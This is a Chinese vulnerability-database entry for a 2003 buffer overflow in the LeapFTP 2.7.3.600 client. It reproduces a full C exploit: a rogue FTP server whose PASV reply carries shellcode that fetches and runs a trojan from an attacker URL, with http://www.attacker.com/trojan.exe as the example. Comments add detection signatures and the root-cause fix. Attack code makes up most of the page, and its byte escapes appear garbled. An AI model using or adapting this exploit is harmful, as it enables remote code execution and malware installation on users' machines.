LeapFTP缓冲区溢出漏洞

LeapFTP缓冲区溢出漏洞

漏洞ID 1107413 漏洞类型 缓冲区溢出
发布时间 2003-07-12 更新时间 2003-08-18
CVE编号 CVE-2003-0558
CNNVD-ID CNNVD-200308-079
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/54
https://www.securityfocus.com/bid/82766
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-079
|漏洞详情
LeapFTP 2.7.3.600 版本存在缓冲区溢出漏洞。远程FTP服务器可以借助对PASV请求返回的超长IP地址响应执行任意代码。
|漏洞EXP
/*
,----------------------------------------------------
;     LeapFTP remote buffer overflow exploit     
;              by drG4njubas \ DWC Group
`----------------------------------------------------
,----------------------------------------------------
;This exploit works against LeapFTP 2.7.3.600
;running on windows 2000 SP3 russian edition.
;Technical details: When LeapFTP requests IP 
;and port by using PASV command if pasv mode 
;is enabled, it causes the buffer overflow on
;the stack area if server's reply for this 
;PASV request has a long IP address: 
;227 (AAAAAAAAA...(1057 bytes)... ,1,1,1,1,1)
;And this buffer overflow can overwrite a 
;Structured Exception Handler on the stack 
;area with an arbitrary value by specifying 
;the address data over 1057 bytes. If this 
;reply contains 0x29 and 0x2E bytes, an 
;exception occurs before Structured Exception
;Handler is overwritten and the program continues
;its normal work. Thanks a lot to RaiSe for
;his wonderful shellcode.
`----------------------------------------------------
*/

#include<winsock.h>
#include<stdio.h>

/*
 * Proof-of-concept from the 2003 advisory: a rogue FTP server that waits for
 * a single LeapFTP client on <port>, answers the login chatter with canned
 * replies and, when the client sends PASV, returns a 227 reply whose host
 * field is an oversized byte string instead of a dotted quad (the header
 * comment above gives ~1057 bytes as the length that overruns the client's
 * stack buffer and reaches the SEH record).
 *
 * Defender's reading of this listing:
 *  - Network signature: a 227 response whose parenthesised host part is not
 *    four small decimal octets plus two port numbers, or is far longer than
 *    "a,b,c,d,p1,p2" can ever be. The fixed strings this program emits
 *    ("220 drG4njubas roxx da world...", "215 Windows_NT version 5.0",
 *    "350 Restarting at blah.") are artefacts of this particular tool, not
 *    of the vulnerability.
 *  - Root cause on the client side: the 227 host field is copied into a
 *    fixed stack buffer without a length check. The fix is a bounded parse
 *    that rejects anything that is not exactly four octets and two ports.
 *  - Windows-only build (winsock, `void main`, `true` without <stdbool.h>,
 *    declarations after statements), so this was evidently built with the
 *    MSVC C++ front end of the day. As rendered on this page the "\x.." byte
 *    escapes and "\r\n" sequences have lost their backslashes, so the
 *    literals below read as plain text.
 */
void main(int argc, char *argv[]){

printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n");
printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;n");
printf("; Coded by drG4njubas \\ DWC Security Group ;n");
printf("; www.dwcgr0up.net ;n");
printf("'''''''''''''''''''''''''''''''''''''''''''''''''''n");

/* argv[1] = TCP port to listen on, argv[2] = URL embedded in the payload
 * (length-checked to 80 bytes further down). */
if(argc < 3){
printf("USAGE : dwclft273.exe <port> <trojan url>n");
printf("EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exen");
return;
}

/* Static payload described in the header comment (NOP sled, shellcode
 * credited to RaiSe, SEH overwrite). Reproduced unchanged from the advisory;
 * it is the host field of the 227 reply sent in the PASV branch below. */
char exploit[] =
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90xEBx30x5FxFCx8BxF7x80"
"x3Fx08x75x03x80x37x08x47x80x3Fx01x75xF2x8BxE6x33xD2xB2x04xC1"
"xE2x08x2BxE2x8BxECx33xD2xB2x03xC1xE2x08x2BxE2x54x5AxB2x7Cx8B"
"xE2xEBx02xEBx57x89x75xFCx33xC0xB4x40xC1xE0x08x89x45xF8x8Bx40"
"x3Cx03x45xF8x8Dx40x7Ex8Bx40x02x03x45xF8x8BxF8x8Bx7Fx0Cx03x7D"
"xF8x81x3Fx4Bx45x52x4Ex74x07x83xC0x14x8BxF8xEBxEBx50x8BxF8x33"
"xC9x33xC0xB1x10x8Bx17x03x55xF8x52xEBx03x57x8BxD7x80x7Ax03x80"
"x74x16x8Bx32x03x75xF8x83xC6x02xEBx02xEBx7Ex8Bx7DxFCx51xF3xA6"
"x59x5Fx74x06x40x83xC7x04xEBxDBx5Fx8Bx7Fx10x03x7DxF8xC1xE0x02"
"x03xF8x8Bx07x8Bx5DxFCx8Dx5Bx11x53xFFxD0x89x45xF4x8Bx40x3Cx03"
"x45xF4x8Bx70x78x03x75xF4x8Dx76x1CxADx03x45xF4x89x45xF0xADx03"
"x45xF4x89x45xECxADx03x45xF4x89x45xE8x8Bx55xECx8Bx75xFCx8Dx76"
"x1Ex33xDBx33xC9xB1x0Fx8Bx3Ax03x7DxF4x56x51xF3xA6x59x5Ex74x06"
"x43x8Dx52x04xEBxEDxD1xE3x8Bx75xE8x03xF3x33xC9x66x8Bx0ExEBx02"
"xEBx7DxC1xE1x02x03x4DxF0x8Bx09x03x4DxF4x89x4DxE4x8Bx5DxFCx8D"
"x5Bx2Dx33xC9xB1x07x8Dx7DxE0x53x51x53x8Bx55xF4x52x8Bx45xE4xFC"
"xFFxD0x59x5BxFDxABx8Dx64x24xF8x38x2Bx74x03x43xEBxF9x43xE2xE1"
"x8Bx45xE0x53xFCxFFxD0xFDxABx33xC9xB1x04x8Dx5Bx0CxFCx53x51x53"
"x8Bx55xC4x52x8Bx45xE4xFFxD0x59x5BxFDxABx38x2Bx74x03x43xEBxF9"
"x43xE2xE5xFCx33xD2xB6x1FxC1xE2x08x52x33xD2x52x8Bx45xD4xFFxD0"
"x89x45xB0x33xD2xEBx02xEBx77x52x52x52x52x53x8Bx45xC0xFFxD0x8D"
"x5Bx03x89x45xACx33xD2x52xB6x80xC1xE2x10x52x33xD2x52x52x8Dx7B"
"x09x57x50x8Bx45xBCxFFxD0x89x45xA8x8Dx55xA0x52x33xD2xB6x1FxC1"
"xE2x08x52x8Bx4DxB0x51x50x8Bx45xB8xFFxD0x8Bx4DxA8x51x8Bx45xB4"
"xFFxD0x8Bx4DxACx51x8Bx45xB4xFFxD0x33xD2x52x53x8Bx45xDCxFFxD0"
"x89x45xA4x8Bx7DxA0x57x8Bx55xB0x52x50x8Bx45xD8xFFxD0x8Bx55xA4"
"x52x8Bx45xD0xFFxD0xEBx02xEBx12x33xD2x90x52x53x8Bx45xCCxFFxD0"
"x33xD2x52x8Bx45xC8xFFxD0xE8xE6xFDxFFxFFx47x65x74x4Dx6Fx64x75"
"x6Cx65x48x61x6Ex64x6Cx65x41x08x6Bx65x72x6Ex65x6Cx33x32x2dx64"
"x6Cx6Cx08x47x65x74x50x72x6Fx63x41x64x64x72x65x73x73x08x4Cx6F"
"x61x64x4Cx69x62x72x61x72x79x41x08x5Fx6Cx63x72x65x61x74x08x5F"
"x6Cx77x72x69x74x65x08x47x6Cx6Fx62x61x6Cx41x6Cx6Cx6Fx63x08x5F"
"x6Cx63x6Cx6Fx73x65x08x57x69x6Ex45x78x65x63x08x45x78x69x74x50"
"x72x6Fx63x65x73x73x08x77x69x6Ex69x6Ex65x74x2dx64x6Cx6Cx08x49"
"x6Ex74x65x72x6Ex65x74x4Fx70x65x6Ex41x08x49x6Ex74x65x72x6Ex65"
"x74x4Fx70x65x6Ex55x72x6Cx41x08x49x6Ex74x65x72x6Ex65x74x52x65"
"x61x64x46x69x6Cx65x08x49x6Ex74x65x72x6Ex65x74x43x6Cx6Fx73x65"
"x48x61x6Ex64x6Cx65x08x4Ex53x08x6Ex73x73x63x2dx65x78x65x08x68"
"x74x74x70x3Ax93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93"
"x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93"
"x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93"
"x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93"
"x93x93x93x93x93x93x93x93x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x25x49xE1"
"x77x90x90x90x90xFEx83x75xFExFFxFFxFEx83xD5xFExFFxFFxFEx83x25"
"xFFxFFxFFx90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x80xABx2FxFFxFFxFFx03x80xABx30xFFxFFxFFx03x80xABx31xFFxFFxFF"
"x03x80xABx32xFFxFFxFFx03x80xABx33xFFxFFxFFx03x80xABx34xFFxFF"
"xFFx03x80xABx35xFFxFFxFFx03x80xABx36xFFxFFxFFx03x80xABx37xFF"
"xFFxFFx03x80xABx38xFFxFFxFFx03x80xABx39xFFxFFxFFx03x80xABx3A"
"xFFxFFxFFx03x80xABx3BxFFxFFxFFx03x80xABx3CxFFxFFxFFx03x80xAB"
"x3DxFFxFFxFFx03x80xABx3ExFFxFFxFFx03x80xABx3FxFFxFFxFFx03x80"
"xABx40xFFxFFxFFx03x80xABx41xFFxFFxFFx03x80xABx42xFFxFFxFFx03"
"x80xABx43xFFxFFxFFx03x80xABx44xFFxFFxFFx03x80xABx45xFFxFFxFF"
"x03x80xABx46xFFxFFxFFx03x80xABx47xFFxFFxFFx03x80xABx48xFFxFF"
"xFFx03x80xABx49xFFxFFxFFx03x80xABx4AxFFxFFxFFx03x80xABx4BxFF"
"xFFxFFx03x80xABx4CxFFxFFxFFx03x80xABx4DxFFxFFxFFx03x80xABx4E"
"xFFxFFxFFx03x80xABx4FxFFxFFxFFx03x80xABx50xFFxFFxFFx03x80xAB"
"x51xFFxFFxFFx03x80xABx52xFFxFFxFFx03x80xABx53xFFxFFxFFx03x80"
"xABx54xFFxFFxFFx03x80xABx55xFFxFFxFFx03x80xABx56xFFxFFxFFx03"
"x80xABx57xFFxFFxFFx03x80xABx58xFFxFFxFFx03x80xABx59xFFxFFxFF"
"x03x80xABx5AxFFxFFxFFx03x80xABx5BxFFxFFxFFx03x80xABx5CxFFxFF"
"xFFx03x80xABx5DxFFxFFxFFx03x80xABx5ExFFxFFxFFx03x80xABx5FxFF"
"xFFxFFx03x80xABx60xFFxFFxFFx03x80xABx61xFFxFFxFFx03x80xABx62"
"xFFxFFxFFx03x80xABx63xFFxFFxFFx03x80xABx64xFFxFFxFFx03x80xAB"
"x65xFFxFFxFFx03x80xABx66xFFxFFxFFx03x80xABx67xFFxFFxFFx03x80"
"xABx68xFFxFFxFFx03x80xABx69xFFxFFxFFx03x80xABx6AxFFxFFxFFx03"
"x80xABx6BxFFxFFxFFx03x80xABx6CxFFxFFxFFx03x80xABx6DxFFxFFxFF"
"x03x80xABx6ExFFxFFxFFx03x80xABx6FxFFxFFxFFx03x80xABx70xFFxFF"
"xFFx03x80xABx71xFFxFFxFFx03x80xABx72xFFxFFxFFx03x80xABx73xFF"
"xFFxFFx03x80xABx74xFFxFFxFFx03x80xABx75xFFxFFxFFx03x80xABx76"
"xFFxFFxFFx03x80xABx77xFFxFFxFFx03x80xABx78xFFxFFxFFx03x80xAB"
"x79xFFxFFxFFx03x80xABx7AxFFxFFxFFx03x80xABx7BxFFxFFxFFx03x80"
"xABx7CxFFxFFxFFx03x80xABx7DxFFxFFxFFx03x80xABx7ExFFxFFxFFx03"
"x80xABx7FxFFxFFxFFx03x80x6Bx80x03x80x6Bx81x03x80x6Bx82x03x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xE9x61xF9xFFxFF";

char *url = argv[2];

/* Hard cap so the URL patch below stays inside the static payload. */
if(strlen(url)>80){
printf("ERROR: trojan url is too long!n");
return;
}

/* URL bytes from index 5 onward are shifted by +3 and written into the
 * payload at offset 839 + i; the listing does not say why the shift is
 * applied. Note that url[] (argv[2]) is modified in place. */
for(unsigned int i = 5; i < strlen(url); i++){
url[i]+=3;
exploit[839+i] = url[i];
}

/* Two marker bytes follow the patched URL. NOTE(review): `i` is declared in
 * the for header above; using it here relies on the pre-standard MSVC
 * scoping rule and is out of scope under C99/C++98. */
exploit[839+i] = 'x0B';
exploit[839+i+1] = 'x04';

WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);

/* Listener bound to INADDR_ANY on the operator-chosen port. bind()/listen()
 * failures return silently, without WSACleanup(). */
SOCKET listen_Sock = socket(AF_INET,SOCK_STREAM,0);
SOCKADDR_IN addr_Sock;

addr_Sock.sin_family = AF_INET;
addr_Sock.sin_addr.s_addr = htonl(INADDR_ANY);
addr_Sock.sin_port = htons(atoi(argv[1]));

printf("Awaiting for connections...n");

if(bind(listen_Sock,(LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr))) return;
if(listen(listen_Sock, 1))return;
SOCKET victim = accept(listen_Sock,NULL,NULL);
printf("Victim connected...n");

/* Greeting banner -- a fixed string and therefore a usable signature for
 * this specific tool. */
char buffer[2048];
sprintf(buffer, "220 drG4njubas roxx da world...rn");
send(victim, buffer, strlen(buffer), NULL);

/* Minimal fake FTP dialogue: each client line is matched by prefix only.
 * recv() does not NUL-terminate and its byte count is discarded, so the
 * strncmp() checks look at whatever the leading bytes of buffer hold; the
 * same buffer is then reused for the reply. */
while(true){
if(recv(victim, buffer, 2048, NULL)==SOCKET_ERROR)return;
if(strncmp(buffer, "USER", 4)==0){
sprintf(buffer, "%srn", "331 Password required for user.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASS", 4)==0){
sprintf(buffer, "%srn", "230 User logged in.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "SYST", 4)==0){
sprintf(buffer, "%srn", "215 Windows_NT version 5.0");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "REST", 4)==0){
sprintf(buffer, "%srn", "350 Restarting at blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PWD", 3)==0){
sprintf(buffer, "%srn", "257 Current directory was changed.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "TYPE", 4)==0){
sprintf(buffer, "%srn", "200 Type set to blah.");
send(victim, buffer, strlen(buffer), NULL);
}
/* The trigger: the whole payload is placed where a 227 reply carries the
 * four address octets. A client that parses this field with a bounded,
 * numeric-only parser (reject anything that is not a,b,c,d,p1,p2) is not
 * affected; LeapFTP 2.7.3.600 copied it into a fixed stack buffer. */
else if(strncmp(buffer, "PASV", 4)==0){
printf("PASV command received, sending exploit...");
sprintf(buffer, "227 (%s,1,1,1,1,1)rn", exploit);
send(victim, buffer, strlen(buffer), NULL);
printf("finnished.n");
break;
}
/* Any other command ends the session: the tool only handles the command
 * sequence a LeapFTP client in passive mode is expected to send. */
else{
printf("ERROR: Wrong client or pasv mode is not enabled.n");
break;
}

}

/* One connection only; both sockets are closed and winsock torn down. */
closesocket(victim);
closesocket(listen_Sock);
WSACleanup();
}

// milw0rm.com [2003-07-12]
|受影响的产品
LeapWare LeapFTP 2.7.3.600
|参考资料

来源:BUGTRAQ
名称: 20030711 LeapFTP remote buffer overflow exploit
链接: http://marc.theaimsgroup.com/?l=bugtraq&m=105795219412333&w=2
